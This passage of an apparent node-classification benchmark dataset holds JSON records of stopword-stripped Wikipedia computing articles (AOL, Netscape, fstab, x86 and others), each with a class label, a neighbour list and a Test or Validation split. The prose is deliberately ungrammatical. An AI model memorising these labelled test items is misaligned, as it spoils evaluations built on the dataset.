response approximately 300 consumer complaints new york attorney general office began inquiry aol customer service policies investigation revealed company elaborate scheme rewarding employees purported retain save subscribers called cancel internet service many instances retention done subscribers wishes without consent scheme customer service personnel received bonuses worth tens thousands dollars could successfully dissuade save half people called cancel service several years aol instituted minimum retention save percentages consumer representatives expected meet bonuses minimum save rates accompanying effect employees honoring cancellations otherwise making cancellation unduly difficult consumers august 24 2005 america online agreed pay 1.25 million state new york reformed customer service procedures agreement aol would longer require customer service representatives meet minimum quota customer retention order receive bonus however agreement covered people state new york june 13 2006 vincent ferrari documented account cancellation phone call blog post stating switched broadband years earlier recorded phone call aol representative refused cancel account unless 30-year-old ferrari explained aol hours still recorded ferrari insisted aol software even installed computer ferrari demanded account canceled regardless aol representative asked speak ferrari father account set conversation aired cnbc cnbc reporters tried account aol cancelled hung immediately ultimately took 45 minutes cancel account july 19 2006 aol entire retention manual released internet august 3 2006 time warner announced company would dissolving aol retention centers due profits hinging 1 billion cost cuts company estimated would lose six million subscribers following year prior 2006 aol infamous unsolicited mass direct mail 3½ floppy disks cd-roms containing software frequent user marketing tactic received criticism environmental cost campaign according pc world 1990s could n't open magazine pc world included mailbox without aol disk falling mass distribution disks seen wasteful public led protest groups one aol cds web-based effort two workers collect one million disks intent return disks aol website started august 2001 estimated 410,176 cds collected august 2007 project shut aol gave clients access usenet 1993 hid least one newsgroup standard list view alt.aol-sucks aol list newsgroup alternative description view changed description flames complaints america online aol clients swarming usenet newsgroups old existing user base started develop strong distaste aol clients referring new state affairs eternal september aol discontinued access usenet june 25 2005 official details provided cause decommissioning usenet access except providing users suggestion access usenet services third-party google groups aol provided community-based message boards lieu usenet aol detailed set guidelines expectations users service known terms service tos also known conditions service cos uk separated three different sections member agreement community guidelines privacy policy three agreements presented users time registration digital acceptance achieved access aol service period volunteer chat room hosts board monitors used chat room hosts given brief online training session test terms service violations many complaints rules govern aol user conduct users disagree tos citing guidelines strict follow coupled fact tos may change without users made aware considerable cause likely due alleged censorship user-generated content earlier years growth aol early 2005 aol stated intention implement certified email system called goodmail allow companies send email users pre-existing business relationships visual indication email trusted source without risk email messages might blocked stripped spam filters decision drew fire moveon characterized program email tax electronic frontier foundation eff characterized shakedown non-profits website called dearaol.com launched online petition blog garnered hundreds signatures people organizations expressing opposition aol use goodmail esther dyson defended move editorial new york times saying hope goodmail succeeds lots competition also think competitors eventually transform services directly serve interests mail recipients instead fees going goodmail aol also shared individual recipients tim lee technology liberation front posted article questioned electronic frontier foundation adopting confrontational posture dealing private companies lee article cited series discussions declan mccullagh politechbot mailing list subject eff danny o'brien antispammer suresh ramasubramanian also compared eff tactics opposing goodmail tactics used republican political strategist karl rove spamassassin developer justin mason posted criticism eff moveon going overboard opposition scheme dearaol.com campaign lost momentum disappeared last post defunct dearaol.com blog— aol starts shakedown made may 9 2006 comcast also used service announced website goodmail ceased operations february 4 2011 longer used service august 4 2006 aol released compressed text file one websites containing 20 million search keywords 650,000 users 3-month period march 1 2006 may 31 intended research purposes aol pulled file public access august 7 wide distribution internet others derivative research titled picture search published authors pass chowdhury torgeson first international conference scalable information systems data used websites aolstalker entertainment purposes users aolstalker encouraged judge aol clients based humorousness personal details revealed search behavior 2003 jason smathers aol employee convicted stealing america online 92 million screen names selling known spammer smathers pled guilty conspiracy charges 2005 smathers pled guilty violations us can-spam act 2003 sentenced august 2005 15 months prison sentencing judge also recommended smathers forced pay 84,000 restitution triple 28,000 sold addresses february 27 2012 class action lawsuit filed support.com inc. partner aol inc lawsuit alleged support.com aol computer checkup scareware uses software developed support.com misrepresented software programs would identify resolve host technical problems computers offered perform free “ scan ” often found problems users computers companies offered sell software—for aol allegedly charged 4.99 month support.com 29—to remedy problems aol inc. support.com inc. settled may 30 2013 8.5 million included 25.00 valid class member 100,000 consumer watchdog electronic frontier foundation judge jacqueline scott corley wrote “ distributing portion funds consumer watchdog meet interests silent class members organization use funds help protect consumers across nation subject types fraudulent misleading conduct alleged ” “ eff ’ mission includes strong consumer protection component especially regards online protection. ” aol continues market computer checkup clear latest computer checkup continues use scareware techniques following media reports prism nsa massive electronic surveillance program june 2013 several technology companies identified participants including aol according leaks said program aol joined prism program 2011 one time aol users online profile hosted aol hometown service aol hometown discontinued users create new profile bebo unsuccessful attempt create social network would compete facebook value bebo decreased tiny fraction 850 million aol paid users forced recreate profiles yet new service called aol lifestream aol took decision shut lifestream february 24 2017 gave users one month notice save photos videos uploaded lifestream following shutdown aol longer provides option hosting user profiles hometown/bebo/lifestream era another user profile could displayed clicking buddy info button aol desktop software shutdown lifestream clicking buddy info something provides information whatsoever selected buddy causes aim home page www.aim.com displayed",
    "neighbors": [
      10755,
      4623,
      4624,
      7697,
      7700,
      10263,
      540,
      9244,
      8735,
      10275,
      6186,
      1074,
      8754,
      8758,
      10808,
      7737,
      9281,
      10316,
      11347,
      4180,
      10836,
      10838,
      1623,
      3672,
      5723,
      4189,
      1121,
      3174,
      106,
      6762,
      11372,
      4722,
      7283,
      3191,
      4728,
      10878,
      3711,
      7809,
      4229,
      6791,
      6797,
      5262,
      1169,
      5784,
      10392,
      5281,
      9377,
      11430,
      688,
      4272,
      7861,
      4793,
      4283,
      1728,
      196,
      200,
      6344,
      7887,
      3293,
      8413,
      6367,
      10466,
      740,
      6884,
      231,
      9448,
      4330,
      4331,
      236,
      9455,
      3320,
      7928,
      3323,
      1290,
      7949,
      784,
      3350,
      798,
      7455,
      8994,
      8998,
      10023,
      11558,
      7983,
      9519,
      7991,
      2366,
      6462,
      1346,
      10056,
      5963,
      9039,
      1372,
      6496,
      3425,
      2404,
      9063,
      7019,
      3948,
      11116,
      4472,
      10110,
      4995,
      3460,
      6023,
      1930,
      6539,
      5004,
      6034,
      3991,
      8093,
      2979,
      10660,
      1962,
      1452,
      1467,
      444,
      446,
      7614,
      6081,
      8130,
      9665,
      6088,
      5078,
      7133,
      10722,
      487,
      488,
      7656,
      5100,
      494,
      5103,
      5114,
      5631
    ],
    "mask": "None"
  },
  {
    "node_id": 489,
    "label": 8,
    "text": "WS-CAF:ws-caf web services composite application framework ws-caf open framework developed oasis purpose define generic open framework applications contain multiple services used together sometimes referred composite applications ws-caf characteristics include interoperability ease implementation ease use scope ws-caf includes ws-caf accepts following web services specifications input benefits results caf intended standard interoperable ways",
    "neighbors": [
      5789,
      7878,
      8070,
      8967,
      5996,
      4979,
      3573,
      10486,
      3517
    ],
    "mask": "Test"
  },
  {
    "node_id": 490,
    "label": 7,
    "text": "Compose.io:compose.io compose private database-as-a-service dbaas platform securely hosting managing shared dedicated mongodb instances compose used majority cloud hosting service heroku mongodb users remote mongo host year compose alumnus combinator business incubator summer 2011 class july 2011 compose announced received first round angel investment 417,000 combinator lerer sv angel shortly thereafter mongohq acquired competing mongo host automated provisioning software mongomachines compose currently integrates 4 paas providers slated future named 4 top 10 enterprise cloud app services 2011 read write web august 2014 compose renamed company mongohq july 2015 compose acquired ibm",
    "neighbors": [
      3323,
      9828,
      8495
    ],
    "mask": "None"
  },
  {
    "node_id": 491,
    "label": 6,
    "text": "Fstab:fstab fstab file systems table file system configuration file commonly found codice_1 unix unix-like computer systems linux part util-linux package fstab file typically lists available disk partitions types file systems data sources necessarily disk-based indicates initialized otherwise integrated larger file system structure fstab file read codice_2 command happens automatically boot time determine overall file system structure thereafter user executes codice_2 command modify structure duty system administrator properly create maintain fstab file fstab still used basic system configuration uses superseded automatic mounting mechanisms file names versions unix example found codice_4 solaris systems fstab file read programs work disk partitions file systems automatically maintained instead written system administrator sometimes operating system installation program however administration tools automatically build edit fstab act graphical editors kfstab graphical configuration utility available kde modern linux systems use udev automounter handle hot swapping devices mp3 players digital cameras instead relying fstab programs pmount allow ordinary users mount unmount filesystems without corresponding fstab entry traditional unix always allowed privileged users root user users wheel group mount unmount devices without fstab entry following example fstab file typical linux system order records fstab important fsck 8 mount 8 umount 8 sequentially iterate fstab thing blank lines comment lines beginning ignored space- tab-separated fields within row typically aligned columns requirement must appear specific order follows missing values last two fields interpreted zeros necessary space characters first second fourth fields indicated octal character code codice_10 filesystems codice_1 eventually mounted using mount 8 surprising options field simply contains comma-separated list options passed directly mount tries mount filesystem options common filesystems many options specific filesystems supported mount listed commonly used full list may found documentation mount note linux traditional unix-like systems generally provided similar functionality slightly different syntax umask user file creation detailed information fstab file found man page linux fstab systems see mount -a command mount including not-yet-mounted filesystems mentioned fstab used system script startup booting note command ignore entries containing codice_37 options section",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      2193,
      5397,
      2198,
      2199,
      6812,
      6138,
      9762,
      3366,
      7847,
      4398,
      11568,
      823,
      1336,
      700,
      7356,
      451,
      965,
      8522,
      3659,
      5840,
      10967,
      9946,
      6120,
      4850,
      5106,
      5492,
      9204,
      9972,
      506,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 492,
    "label": 4,
    "text": "Partclone:partclone partclone partition clone restore tool provides utilities back restore partitions designed higher compatibility file system library developed nchc free software labs taiwan default backup application clonezilla fog version 1.00 redo backup recovery simply front end partclone supports many file systems good performance skips portions file system marked free space partclone currently supports following filesystems ext2 ext3 ext4 hfs+ reiserfs reiser4 btrfs vmfs v3 v5 xfs jfs ufs ntfs fat 12/16/32 exfat run partclone particular filesystem one uses command 'partclone. fstype similar manner mkfs command partclone partition image tool attempts backup used data blocks written c focuses cloning filesystems opposed cloning disks basic features",
    "neighbors": [
      9762,
      4154,
      8772,
      5612,
      823,
      7983,
      8306,
      2197,
      246,
      2199,
      4982,
      3834,
      2045,
      7070
    ],
    "mask": "Validation"
  },
  {
    "node_id": 493,
    "label": 0,
    "text": "Kevin_Lenzo:kevin lenzo kevin lenzo born 1967 american computer scientist wrote initial infobot founded perl foundation chairman 2007 yet another perl conferences yapc released cmu sphinx open source founded cepstral llc major contributor festival speech synthesis system festvox flite voice basis number synthetic voices including freetts flite cmu_us_kal_diphone festival voice also contributed perl modules cpan",
    "neighbors": [
      2281,
      5251,
      3533,
      8582
    ],
    "mask": "Test"
  },
  {
    "node_id": 494,
    "label": 5,
    "text": "Netscape_(web_browser):netscape web browser netscape web browser general name series web browsers formerly produced netscape communications corporation former subsidiary aol original browser dominant browser terms usage share result first browser war lost virtually share internet explorer netscape discontinued support netscape browsers client products terminated march 1 2008 netscape navigator name netscape web browser versions 1.0 4.8 first beta release versions browser released 1994 known mosaic mosaic netscape legal challenge national center supercomputing applications makers ncsa mosaic many netscape founders spent time developing led name change netscape navigator company name also changed mosaic communications corporation netscape communications corporation browser easily advanced available therefore instant success becoming market leader still beta netscape feature-count market share continued grow rapidly version 1.0 released version 2.0 added full mail reader called netscape mail thus transforming netscape mere web browser internet suite period browser suite known netscape navigator around time aol started bundling software microsoft internet explorer version 3.0 netscape first beta codenamed atlas first face serious competition form microsoft internet explorer 3.0 netscape easily held microsoft challenge remained number one browser time version 3.0 also available gold version featured wysiwyg html editor later added netscape communicator standard feature sold retail software profit netscape 3.0 introduced many new features new plug-ins background colors tables archive attribute applet element netscape navigator 3 huge success undisputed web browser giant time 90 share later eroded free internet explorer included windows 95 highest version line 3.04 netscape 4 addressed problem netscape navigator used name suite browser contained within renaming suite netscape communicator releasing five preview releases 1996–1997 netscape corp. released final version netscape communicator june 1997 new version less based netscape navigator 3 code updated added new features support certain css1 elements minimal dynamic font support proprietary object element new suite successful despite increasing competition internet explorer 4.0 problems outdated browser core communicator suite made netscape navigator netscape mail newsgroups netscape address book netscape composer html editor later became mozilla composer eventually split completely separate product nvu october 1998 version 4.5 netscape communicator released new version featured various functionality improvements especially mail/news component update browser core functionality basically identical version 4.08 one month later netscape communications corporation bought aol standalone version netscape navigator still available discontinued version 4.08 windows standalone versions operating systems unix/linux maintained version 4.8 january 1998 netscape communications corporation announced future versions software would free charge developed open source community mozilla netscape communicator 5.0 announced codenamed gromit significant delays release netscape next major version communicator therefore aged badly many years still used result advanced support html 4 css dom ecmascript internet explorer starting version 4 up-to-date internet explorer 5.0 became market leader november 1998 work netscape 5.0 cancelled favor developing completely new program scratch netscape 5.0 codenamed gromit continuation 4.x code two pre-alpha versions written one based original communicator code layout engine stability performance enhancements 4.0 codebase codenamed mariner another using gecko layout engine though netscape originally intended deploy mariner later replace gecko developed scratch netscape 5 mariner scrapped completely however versions continued numbered released netscape formed mozilla foundation developed mozilla application suite using gecko open-source mozilla browser turn used basis netscape 6 1998 informal group called mozilla organization formed largely funded netscape vast majority programmers working code paid netscape coordinate development netscape 5 codenamed gromit would based communicator source code aging communicator code proved difficult work decision made late october drop code branch communicator 4.5 core rendering engine start scratch using standards-compliant gecko rendering engine gecko featured mozilla web browser additions netscape 6 based decision meant netscape next major version severely delayed meantime netscape taken aol acting pressure web standards project forced new division release netscape 6.0 2000 public beta versions released april august october netscape 6.0 released november 2000 suite consisted netscape navigator communicator components addition built-in aol instant messenger client branded netscape instant messenger however clear netscape 6 yet ready release flopped badly based mozilla 0.6 ready used general public yet due many serious bugs would cause crash often render web pages slowly later versions netscape 6 much improved 6.2.x regarded especially good release browser still struggled make impact disappointed community netscape 7.0 codenamed mach five based mozilla 1.0.1 released august 2002 direct continuation netscape 6 similar components picked users still much minority browser one problems mozilla worthy adversary addition aol decided deactivate mozilla popup-blocker functionality netscape 7.0 created outrage community response complaints aol integrated pop-up blocker netscape 7.01 addition netscape introduced new aol-free-version without usual aol addons browser suite netscape 7.1 codenamed buffy based mozilla 1.4 released june 2003 2003 aol closed netscape division laid-off reassigned netscape employees mozilla.org continued independent mozilla foundation taking many netscape ex-employees aol continued develop netscape in-house due staff committed improvements minimal one year later august 2004 last version based mozilla released netscape 7.2 based mozilla 1.7.2 2005 2007 netscape releases became known netscape browser aol chose base netscape browser relatively successful mozilla firefox re-written version mozilla produced mozilla foundation release full internet suite solely web browser controversial decisions include versions made microsoft windows featuring gecko rendering engine previous releases trident engine used internet explorer aol acquisition netscape years earlier made less surprise company laid netscape team outsourced development mercurial communications netscape browser 8.1.3 released april 2 2007 included general bug fixes identified versions 8.0–8.1.2 netscape confirmed 23 january 2007 netscape browser versions 8.0-8.1.2 succeeded new stand-alone browser release netscape navigator 9 features said include newsfeed support become integrated propeller internet portal alongside enhanced methods discussion submission voting web pages also sees browser return multi-platform support across windows linux mac os x like netscape version 8.x new release based upon popular mozilla firefox version 2.0 full support firefox add-ons plugins netscape provided also first time since 2004 browser produced in-house programming staff beta program first released 5 june 2007 final version released october 15 2007 december 28 2007 netscape developers announced aol would discontinue web browser february 1 2008 due low market share january 28 2008 netscape revised date march 1 2008 offered support migration flock mozilla firefox",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9770,
      5677,
      559,
      4661,
      3639,
      10808,
      1594,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      2139,
      6747,
      4189,
      3167,
      1642,
      9834,
      9841,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      2182,
      6791,
      6797,
      8854,
      10392,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      11469,
      9424,
      8917,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      9987,
      7943,
      1807,
      278,
      3350,
      7965,
      7455,
      8994,
      1834,
      10026,
      7983,
      823,
      10057,
      11082,
      10060,
      2893,
      11112,
      877,
      8557,
      3961,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      944,
      5054,
      10174,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      488,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 495,
    "label": 2,
    "text": "Mobilinux:mobilinux mobilinux linux kernel operating system targeted smartphones announced montavista software april 25 2005 mobilinux based open source open standard technology designed scalability maximized battery power usage single-chip mobile phones 35 million phones mobile devices run mobilinux far commercial linux mobilinux powered version 2.6 linux kernel offers less one second boot times event broker also includes alsa sound driver support embedded systems standard linux 2.6.21+ kernels exists montavista devrocket software based eclipse easy development environment platform",
    "neighbors": [
      11271,
      3089,
      9253,
      11305,
      3626,
      7727,
      56,
      9784,
      1083,
      59,
      4673,
      7246,
      7253,
      1110,
      3162,
      607,
      2658,
      3685,
      6763,
      10860,
      2671,
      8315,
      8316,
      8829,
      11388,
      11391,
      4225,
      2179,
      6276,
      8837,
      10393,
      10394,
      6301,
      673,
      3745,
      7854,
      3248,
      7857,
      2738,
      4790,
      5824,
      8907,
      4305,
      2259,
      8423,
      4841,
      6890,
      7913,
      9964,
      7920,
      5363,
      9461,
      6393,
      5369,
      8957,
      7435,
      4364,
      2321,
      5397,
      4887,
      5406,
      4383,
      10530,
      7991,
      7483,
      3903,
      7492,
      2375,
      11079,
      10080,
      2914,
      10599,
      9064,
      6508,
      2925,
      7020,
      7534,
      9074,
      10127,
      10149,
      439,
      4039,
      2001,
      3542,
      9693,
      485,
      10215,
      3561,
      8177,
      1524
    ],
    "mask": "Test"
  },
  {
    "node_id": 496,
    "label": 4,
    "text": "Single-loss_expectancy:single-loss expectancy single-loss expectancy sle monetary value expected occurrence risk asset related risk management risk assessment single-loss expectancy mathematically expressed exposure factor represented impact risk asset percentage asset lost example asset value reduced two thirds exposure factor value 0.66 asset completely lost exposure factor 1.0 result monetary value unit single-loss expectancy expressed euros dollars yens etc exposure factor subjective potential percentage loss specific asset specific threat realized exposure factor subjective value person assessing risk must define",
    "neighbors": [
      7979
    ],
    "mask": "None"
  },
  {
    "node_id": 497,
    "label": 3,
    "text": "Amaurote:amaurote amaurote british video game 8-bit computer systems released 1987 mastertronic mastertronic added dimension label music game written david whittaker game instructions player controls arachnus 4 armoured fighting-machine moves four legs player must first select sector play via map screen control arachnus wanders isometric top-down commodore 64 version view cityscape attacking marauding insects searching insect queen using scanner arachnus attacks launching bouncing bombs launch one time bomb misses intended target player wait hits scenery bounces fence play area fire queen located player radio-in supa-bomb used destroy queen player also radio-in supplies additional bombs even ask pulled combat zone extra weaponry costs player dosh in-game currency game favourably reviewed crash magazine said graphically impressive well designed fun play given 92 overall rating zzap 64 less impressed commodore 64 version criticised dull gameplay programming bugs rated 39 overall origin city name amaurote derives utopia sir thomas 1478–1535 second book cities namely amaurote following description given cities knoweth one knoweth like one another farforth nature place permitteth describe therefore one skilleth greatly rather amaurote worthiest dignity",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 498,
    "label": 3,
    "text": "Hyper_Sports:hyper sports hyper sports known japan arcade game published 1984 konami sequel 1983 track field features seven new olympic events like predecessor hyper sports two run buttons one action button per player japanese release game sported official license 1984 summer olympics gameplay much track field player competes event tries score points based performance criteria also beating computer entrants event also player tries exceed qualification time distance score advance next event hyper sports events passed successfully player advances next round events faster harder qualify events changed include new sports commodore 64 version reviewed zzap 64 said first rate conversion praised graphics sound presentation game rated 90 overall zx spectrum version voted number 59 sinclair top 100 games time game went become biggest selling spectrum game month gallup charts spectrum version also voted number 59 sinclair official top 100 games time two events game skeet shooting vault featured bbc television programme first class june 2018 konami unveiled reimagining game hyper sports r nintendo switch",
    "neighbors": [
      8034,
      10931,
      9006,
      10695
    ],
    "mask": "Validation"
  },
  {
    "node_id": 499,
    "label": 3,
    "text": "X86:x86 x86 family instruction set architectures based intel 8086 microprocessor 8088 variant 8086 introduced 1978 fully 16-bit extension intel 8-bit 8080 microprocessor memory segmentation solution addressing memory covered plain 16-bit address term x86 came names several successors intel 8086 processor end 86 including 80186 80286 80386 80486 processors many additions extensions added x86 instruction set years almost consistently full backward compatibility architecture implemented processors intel cyrix amd via many companies also open implementations zet soc platform nevertheless intel amd via hold x86 architectural licenses producing modern 64-bit designs term synonymous ibm pc compatibility implies multitude computer hardware embedded systems well general-purpose computers used x86 chips pc-compatible market started ibm pc 1981 2018 majority personal computers laptops sold based x86 architecture categories—especially high-volume mobile categories smartphones tablets—are dominated arm high end x86 continues dominate compute-intensive workstation cloud computing segments 1980s early 1990s 8088 80286 still common use term x86 usually represented 8086 compatible cpu today however x86 usually implies binary compatibility also 32-bit instruction set 80386 due fact instruction set become something lowest common denominator many modern operating systems probably also term became common introduction 80386 1985 years introduction 8086 8088 intel added complexity naming scheme terminology iapx ambitious ill-fated intel iapx 432 processor tried successful 8086 family chips applied kind system-level prefix 8086 system including coprocessors 8087 8089 well simpler intel-specific system chips thereby described iapx 86 system also terms irmx operating systems isbc single-board computers isbx multimodule boards based 8086-architecture together heading microsystem 80 however naming scheme quite temporary lasting years early 1980s although 8086 primarily developed embedded systems small multi-user single-user computers largely response successful 8080-compatible zilog z80 x86 line soon grew features processing power today x86 ubiquitous stationary portable personal computers also used midrange computers workstations servers new supercomputer clusters top500 list large amount software including large list using x86-based hardware modern x86 relatively uncommon embedded systems however small low power applications using tiny batteries well low-cost microprocessor markets home appliances toys lack significant x86 presence simple 8-bit 16-bit based architectures common although x86-compatible via c7 via nano amd geode athlon neo intel atom examples 32- 64-bit designs used relatively low power low cost segments several attempts including intel end market dominance inelegant x86 architecture designed directly first simple 8-bit microprocessors examples iapx 432 project originally named intel 8800 intel 960 intel 860 intel/hewlett-packard itanium architecture however continuous refinement x86 microarchitectures circuitry semiconductor manufacturing would make hard replace x86 many segments amd 64-bit extension x86 intel eventually responded compatible design scalability x86 chips eight-core intel xeon 12-core amd opteron underlining x86 example continuous refinement established industry standards resist competition completely new architectures table lists processor models model series implementing variations x86 instruction set chronological order line item characterized significantly improved commercially successful processor microarchitecture designs various times companies ibm nec amd ti stm fujitsu oki siemens cyrix intersil c nexgen umc dm p started design manufacture x86 processors cpus intended personal computers well embedded systems x86 implementations seldom simple copies often employ different internal microarchitectures well different solutions electronic physical levels quite naturally early compatible microprocessors 16-bit 32-bit designs developed much later personal computer market real quantities started appear around 1990 i386 i486 compatible processors often named similarly intel original chips companies designed manufactured x86 x87 processors include itt corporation national semiconductor ulsi system technology weitek following fully pipelined i486 intel introduced pentium brand name unlike numbers could trademarked new set superscalar x86 designs x86 naming scheme legally cleared x86 vendors choose different names x86-compatible products initially chose continue variations numbering scheme ibm partnered cyrix produce 5x86 efficient 6x86 m1 6x86mx mii lines cyrix designs first x86 microprocessors implementing register renaming enable speculative execution amd meanwhile designed manufactured advanced delayed 5k86 k5 internally closely based amd earlier 29k risc design similar nexgen nx586 used strategy dedicated pipeline stages decode x86 instructions uniform easily handled micro-operations method remained basis x86 designs day early versions microprocessors heat dissipation problems 6x86 also affected minor compatibility problems nx586 lacked floating point unit fpu crucial pin-compatibility k5 somewhat disappointing performance eventually introduced customer ignorance alternatives pentium series contributed designs comparatively unsuccessful despite fact k5 good pentium compatibility 6x86 significantly faster pentium integer code amd later managed establish serious contender k6 set processors gave way successful athlon opteron also contenders centaur technology formerly idt rise technology transmeta via technologies energy efficient c3 c7 processors designed centaur company sold many years centaur newest design via nano first processor superscalar speculative execution introduced time intel first in-order processor since p5 pentium intel atom instruction set architecture twice extended larger word size 1985 intel released 32-bit 80386 later known i386 gradually replaced earlier 16-bit chips computers although typically embedded systems following years extended programming model originally referred i386 architecture like first implementation intel later dubbed ia-32 introducing unrelated ia-64 architecture 1999-2003 amd extended 32-bit architecture 64 bits referred x86-64 early documents later amd64 intel soon adopted amd architectural extensions name ia-32e later using name em64t finally using intel 64 microsoft sun microsystems/oracle also use term x64 many linux distributions bsds also use amd64 term microsoft windows example designates 32-bit versions x86 64-bit versions x64 installation files 64-bit windows versions required placed directory called amd64 x86 architecture variable instruction length primarily cisc design emphasis backward compatibility instruction set typical cisc however basically extended version simple eight-bit 8008 8080 architectures byte-addressing enabled words stored memory little-endian byte order memory access unaligned addresses allowed valid word sizes largest native size integer arithmetic memory addresses offsets 16 32 64 bits depending architecture generation newer processors include direct support smaller integers well multiple scalar values handled simultaneously via simd unit present later generations described immediate addressing offsets immediate data may expressed 8-bit quantities frequently occurring cases contexts -128..127 range enough typical instructions therefore 2 3 bytes length although much longer single-byte conserve encoding space registers expressed opcodes using three four bits latter via opcode prefix 64-bit mode one operand instruction memory location however memory operand may also destination combined source destination operand source either register immediate among factors contributes code size rivals eight-bit machines enables efficient use instruction cache memory relatively small number general registers also inherited 8-bit ancestors made register-relative addressing using small immediate offsets important method accessing operands especially stack much work therefore invested making accesses fast register accesses i.e one cycle instruction throughput circumstances accessed data available top-level cache dedicated floating point processor 80-bit internal registers 8087 developed original 8086 microprocessor subsequently developed extended 80387 later processors incorporated backward compatible version functionality microprocessor main processor addition modern x86 designs also contain simd-unit see sse instructions work parallel one two 128-bit words containing two four floating point numbers 64 32 bits wide respectively alternatively 2 4 8 16 integers 64 32 16 8 bits wide respectively presence wide simd registers means existing x86 processors load store 128 bits memory data single instruction also perform bitwise operations although integer arithmetic full 128-bits quantities parallel intel sandy bridge processors added avx advanced vector extensions instructions widening simd registers 256 bits knights corner architecture used intel xeon phi co-processors uses 512-bit wide simd registers execution current x86 processors employ extra decoding steps split instructions smaller pieces called micro-operations handed control unit buffers schedules compliance x86-semantics executed partly parallel one several less specialized execution units modern x86 designs thus pipelined superscalar also capable order speculative execution via branch prediction register renaming memory dependence prediction means may execute multiple partial complete x86 instructions simultaneously necessarily order given instruction stream intel amd starting amd zen cpus also capable simultaneous multithreading two threads per core xeon phi four threads per core case intel transactional memory tsx introduced mid-1990s method sometimes referred risc core risc translation partly marketing reasons also micro-operations share properties certain types risc instructions however traditional microcode used since 1950s also inherently shares many properties new method differs mainly translation micro-operations occurs asynchronously synchronize execution units decode steps opens possibilities analysis buffered code stream therefore permits detection operations performed parallel simultaneously feeding one execution unit latest processors also opposite appropriate combine certain x86 sequences compare followed conditional jump complex micro-op fits execution model better thus executed faster less machine resources involved another way try improve performance cache decoded micro-operations processor directly access decoded micro-operations special cache instead decoding intel followed approach execution trace cache feature netburst microarchitecture pentium 4 processors later decoded stream buffer core-branded processors since sandy bridge transmeta used completely different method x86 compatible cpus used just-in-time translation convert x86 instructions cpu native vliw instruction set transmeta argued approach allows power efficient designs since cpu forgo complicated decode step traditional x86 implementations minicomputers late 1970s running 16-bit 64-kb address limit memory become cheaper minicomputers like pdp-11 used complex bank-switching schemes case digital vax redesigned much expensive processors could directly handle 32-bit addressing data original 8086 developed simple 8080 microprocessor primarily aiming small inexpensive computers specialized devices instead adopted simple segment registers increased memory address width 4 bits multiplying 64-kb address 16 20-bit address could address total one megabyte 1,048,576 bytes quite large amount small computer time concept segment registers new many mainframes used segment registers swap quickly different tasks practice x86 much-criticized implementation greatly complicated many common programming tasks compilers however architecture soon allowed linear 32-bit addressing starting 80386 late 1985 major actors microsoft took several years convert 16-bit based systems 80386 80486 therefore largely used fast still 16-bit based 8086 many years data code could managed within near 16-bit segments within 64 kb portions total 1 mb address space compiler could operate far mode using 32-bit codice_1 pairs reaching 1 mb would also prove quite limiting mid-1980s working emerging pc market made simple translate software older 8008 8080 8085 z80 newer processor 1985 16-bit segment addressing model effectively factored introduction 32-bit offset registers 386 design real mode segmentation achieved shifting segment address left 4 bits adding offset order receive final 20-bit address example ds a000h si 5677h ds si point absolute address ds × 10h si a5677h thus total address space real mode 2 bytes 1 mb quite impressive figure 1978 memory addresses consist segment offset every type access code data stack default segment register associated data register usually ds code cs stack ss data accesses segment register explicitly specified using segment override prefix use four segment registers scheme two different segment/offset pairs point single absolute location thus ds a111h si 4567h ds si point a5677h scheme makes impossible use four segments cs ss vital correct functioning program ds es used point data segments outside program precisely outside currently executing segment program stack protected mode introduced 80286 segment register longer contains physical address beginning segment contain selector points system-level structure called segment descriptor segment descriptor contains physical address beginning segment length segment access permissions segment offset checked length segment offsets referring locations outside segment causing exception offsets referring locations inside segment combined physical address beginning segment get physical address corresponding offset segmented nature make programming compiler design difficult use near far pointers affects performance addressing modes 16-bit x86 processors summarized formula addressing modes 32-bit x86 processors 32-bit code 64-bit x86 processors summarized formula addressing modes 64-bit code 64-bit x86 processors summarized formula instruction relative addressing 64-bit code rip displacement rip instruction pointer register simplifies implementation position-independent code used shared libraries operating systems 8086 eight-bit alternatively i/o space one segment stack memory supported computer hardware words two bytes pushed stack stack grows toward numerically lower addresses pointing recently pushed item 256 interrupts invoked hardware software interrupts cascade using stack store return address original intel 8086 8088 fourteen 16-bit registers four ax bx cx dx general-purpose registers gprs although may additional purpose example cx used counter loop instruction accessed two separate bytes thus bx high byte accessed bh low byte bl two pointer registers special roles sp stack pointer points top stack bp base pointer often used point place stack typically local variables see frame pointer registers si di bx bp address registers may also used array indexing four segment registers cs ds ss es used form memory address flags register contains flags carry flag overflow flag zero flag finally instruction pointer ip points next instruction fetched memory executed register directly accessed read written program intel 80186 80188 essentially upgraded 8086 8088 cpu respectively on-chip peripherals added cpu registers 8086 8088 addition interface registers peripherals 8086 8088 80186 80188 use optional floating-point coprocessor 8087 8087 appears programmer part cpu adds eight 80-bit wide registers st 0 st 7 hold numeric data one seven formats 32- 64- 80-bit floating point 16- 32- 64-bit binary integer 80-bit packed decimal integer intel 80286 support protected mode three special registers hold descriptor table addresses gdtr ldtr idtr fourth task register tr used task switching 80287 floating-point coprocessor 80286 registers 8087 data formats advent 32-bit 80386 processor 16-bit general-purpose registers base registers index registers instruction pointer flags register segment registers expanded 32 bits nomenclature represented prefixing e extended register names x86 assembly language thus ax register corresponds lowest 16 bits new 32-bit eax register si corresponds lowest 16 bits esi general-purpose registers base registers index registers used base addressing modes registers except stack pointer used index addressing modes two new segment registers fs gs added greater number registers instructions operands machine code format expanded provide backward compatibility segments executable code marked containing either 16-bit 32-bit instructions special prefixes allow inclusion 32-bit instructions 16-bit segment vice versa 80386 optional floating-point coprocessor 80387 eight 80-bit wide registers st 0 st 7 like 8087 80287 80386 could also use 80287 coprocessor 80486 subsequent x86 models floating-point processing unit fpu integrated on-chip pentium mmx added eight 64-bit mmx integer registers mmx0 mmx7 share lower bits 